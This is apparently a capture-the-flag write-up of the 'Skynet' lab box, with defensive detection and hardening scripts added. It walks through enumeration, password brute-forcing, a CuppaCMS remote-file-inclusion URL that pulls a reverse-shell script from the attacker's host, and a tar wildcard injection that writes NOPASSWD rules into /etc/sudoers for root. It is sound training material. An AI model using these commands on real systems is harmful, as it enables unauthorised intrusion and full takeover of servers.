This was a fun box

This room was good fun and involved a few different techniques to complete.  There was a lot of enumeration and an interesting new technique I learned to escalate privileges.

Ports

I started the same way as always, by running a port scan on the server.  This returned the following.

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

I notice there is a web server and some Samba ports open, so I decide to investigate these further.

Enumeration

Directory

I run gobuster to see if I can find any hidden directories.

┌──(gareth㉿SRF239-L)-[~/Desktop/Files/Skynet]
└─$ gobuster dir -u http://10.10.237.150 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.237.150
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/09 05:01:22 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2021/01/09 05:01:46 Finished
===============================================================

The /admin and /squirrelmail directories are the most interesting to me at this stage. I also decide to enumerate the samba server and see if I can find any open shares.

Samba

I ran the enum4linux.sh script against the server and it returned a lot of information.  The most useful of which was the following:

 ==============================
|    Users on 10.10.237.150    |
 ==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson       Name:   Desc:

user:[milesdyson] rid:[0x3e8]

 ==========================================
|    Share Enumeration on 10.10.237.150    |
 ==========================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      Skynet Anonymous Share
        milesdyson      Disk      Miles Dyson Personal Share
        IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
        
[+] Attempting to map shares on 10.10.237.150
//10.10.237.150/print$  Mapping: DENIED, Listing: N/A
//10.10.237.150/anonymous       Mapping: OK, Listing: OK
//10.10.237.150/milesdyson      Mapping: DENIED, Listing: N/A
//10.10.237.150/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ========================================================================
|    Users on 10.10.237.150 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2393614426-3774336851-1116533619
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\milesdyson (Local User)

So I know there is a user on the system with the username milesdyson, and there's an anonymous samba share I can connect to and explore.  Upon exploration of this samba share I find a file called log1.txt which appears to contain a list of terminator-related passwords.

SquirrelMail

So now I have a potential username and a list of what appears to be passwords.  I use this list of passwords and try to log in to the SquirrelMail instance at http://10.10.237.150/squirrelmail.  I manage to find the correct password after running the list through Burp Suite.

This looks interesting

I was really glad this email login was not a dead-end.  With this password, I was able to connect to the previously enumerated samba share milesdyson.  In this share, there was a text file which mentioned a directory I had not discovered.

important.txt

CuppaCMS

After visiting the URL and enumerating it with gobuster, I discovered the administrator login URL, which revealed that this particular site was an instance of CuppaCMS.  I had not heard of CuppaCMS before but I was certain there must exist some kind of vulnerability for it.  I did a quick search using searchsploit and discovered there is a Remote File Inclusion vulnerability, 25971.

To exploit this vulnerability I didn't even need to log in: I could simply visit a URL that points the vulnerable script at a server hosting my reverse-shell PHP code, and then I had a shell on the server.

I set up a netcat listener on port 4444 and visited this address in my browser.

http://10.10.237.150/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.145.210:8080/reverse-shell.php

This works because of a line of code in /alerts/alertConfigField.php in CuppaCMS, which reads <?php include($_REQUEST["urlConfig"]); ?>.  PHP's include() fetches and executes whatever the urlConfig parameter passed in the GET request points at, and because the server allowed remote URLs to be included (this needs allow_url_include to be enabled in PHP), that was my reverse shell script.

After gaining shell access as the www-data user I was able to cat the user.txt file to get my first flag.
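A defender-side counterpart to the include() bug above, added here and not part of the original write-up: a small POSIX shell check that flags access-log requests where urlConfig points at a remote scheme, including the %3A/%2F-encoded form.  The log lines and the 203.0.113.10 address are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post): spot remote-include attempts
# against the CuppaCMS alerts script in Apache access logs. The log lines
# below are constructed; 203.0.113.10 is a placeholder attacker address.
SAMPLE_LOG='10.0.0.5 - - [09/Jan/2021:05:10:01 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.9 - - [09/Jan/2021:05:11:07 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://203.0.113.10:8080/reverse-shell.php HTTP/1.1" 200 118
10.0.0.9 - - [09/Jan/2021:05:11:40 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http%3A%2F%2F203.0.113.10%2Fx.php HTTP/1.1" 200 118
10.0.0.7 - - [09/Jan/2021:05:12:00 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=alerts.conf HTTP/1.1" 200 118'

# Reads access-log lines on stdin and prints "client_ip target_url" for each
# request whose urlConfig value, after undoing %3A/%2F encoding, names a
# remote scheme. A plain local file name (last sample line) is not reported.
find_remote_includes() {
    while IFS= read -r line; do
        case "$line" in *urlConfig=*) ;; *) continue ;; esac
        ip=${line%% *}                 # first field: client address
        val=${line#*urlConfig=}        # everything after the parameter name
        val=${val%% *}                 # value ends at the next space ...
        val=${val%%\&*}                # ... or at the next query parameter
        decoded=$(printf '%s' "$val" | sed 's/%3[aA]/:/g; s/%2[fF]/\//g')
        case "$decoded" in
            http://*|https://*|ftp://*) printf '%s %s\n' "$ip" "$decoded" ;;
        esac
    done
}

# Runs the check over the constructed sample and returns the number of hits.
count_sample_hits() {
    printf '%s\n' "$SAMPLE_LOG" | find_remote_includes | grep -c .
}
```

In a real deployment the function would be fed `tail -f` output from the Apache access log rather than the embedded sample.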

Privilege Escalation

I now have a set of steps I undertake manually on any server after I gain shell access, before running automated enumeration tools like linpeas.  This includes scanning for any binaries with the SUID bit set, checking which commands (if any) I can run via sudo, and checking whether there are any crontab scripts scheduled to run as the root user.

$ cat /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Crontab

From checking the crontab file I discovered a script called backup.sh, inside the /home/milesdyson/backups directory, that runs every minute as root.  The contents of this backup.sh file revealed that it was taking a tar backup of the contents of the /var/www/html directory, a directory which, as the www-data user, I can write to.

Exploiting tar with wildcard

$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

The interesting part here is the * wildcard: before tar runs, the shell expands it into the name of every file in the directory, so each file name becomes a separate command-line argument.  If this was not used, you would have to manually include the path of each file you wanted in the tar file, like so:

tar cf /home/milesdyson/backups/backup.tgz /var/www/html/index.html /var/www/html/index.js ...

GNU tar accepts additional command-line options anywhere on the command line, including in amongst the file names, and long options begin with --.

It is, however, possible to create files whose names begin with - and get the tar binary to treat those as command-line options, rather than interpreting them as files to be archived, because tar cannot tell an expanded file name from an option typed by the user.

With that in mind, I created a bash script to grant the www-data user permission to run all commands via sudo without being prompted for a password, and saved it as root.sh.

$ cat root.sh
echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers

I then created the following two files in the /var/www/html directory.  When creating files whose names begin with - you have to specify the absolute path, or touch itself will parse the name as an option and fail, hence the $(pwd) prefix, which supplies the present working directory.

$ touch $(pwd)/--checkpoint-action=exec=sh\ root.sh
$ touch $(pwd)/--checkpoint=1

The tar documentation explains that --checkpoint=N makes tar pause at every N records written, and --checkpoint-action tells it what to do at each checkpoint, with exec= running an arbitrary command.  Because the cron job runs tar as root, the command runs as root too.  That is just what we want.

I then waited one very long minute for the cronjob to execute.

Eventually, I was able to run sudo -u root /bin/bash and cat /root/root.txt to capture the remaining flag.
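For the defensive side of the tar wildcard issue, the following is an added example (not from the original post or the room): the backup job rewritten so that file names in the archived directory never reach tar's command line, alongside a check an administrator can run on a directory a cron job is about to archive.  The temporary directory layout is constructed for the demo; the option-shaped file name is the harmless --checkpoint=1 from the post.

```shell
#!/bin/sh
# Added example (not from the original post): a backup job immune to
# wildcard argument injection, plus a pre-flight check for option-shaped
# file names. Directory contents below are constructed for the demo.

# Mirrors the cron script from the post: the bare * expands to file names,
# and any name starting with '-' is read by tar as an option.
unsafe_backup() {            # $1 = source dir, $2 = absolute archive path
    ( cd "$1" && tar cf "$2" * )
}

# Hardened form: tar walks the directory itself, so nothing inside it is ever
# placed on the command line; '--' also ends option parsing just in case.
safe_backup() {              # $1 = source dir, $2 = archive path
    tar -cf "$2" -C "$1" -- .
}

# Print every entry directly under $1 whose name begins with '-'.
# A non-empty result means a wildcard-based tar (or rm, chown, ...) job
# over this directory would receive file-name-controlled arguments.
option_like_names() {
    for f in "$1"/-*; do
        [ -e "$f" ] || continue
        printf '%s\n' "${f##*/}"
    done
}

# Builds a throwaway directory with one real file and one option-shaped
# name, archives it with safe_backup, and prints how many archive entries
# carry the option-shaped name (1: it was stored as data, not consumed).
demo_safe_backup() {
    tmp=$(mktemp -d)
    mkdir "$tmp/html"
    printf 'hello\n' > "$tmp/html/index.html"
    : > "$tmp/html/--checkpoint=1"
    safe_backup "$tmp/html" "$tmp/backup.tar"
    n=$(tar -tf "$tmp/backup.tar" | grep -c -F -- '--checkpoint=1')
    rm -rf "$tmp"
    echo "$n"
}

# Prints how many option-shaped names the check finds in the same layout (1).
demo_check() {
    tmp=$(mktemp -d)
    : > "$tmp/--checkpoint=1"
    : > "$tmp/index.html"
    option_like_names "$tmp" | grep -c .
    rm -rf "$tmp"
}
```

Running option_like_names against /var/www/html from the cron job (and refusing to archive when it prints anything) would have caught the two files created above before tar ever saw them.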

Summary

I really enjoyed this room as it felt like a somewhat realistic scenario that one might find on an actual server, with a few hoops to jump through to find the vulnerability to exploit.  I also enjoyed learning about how to use the tar binary to gain privilege escalation.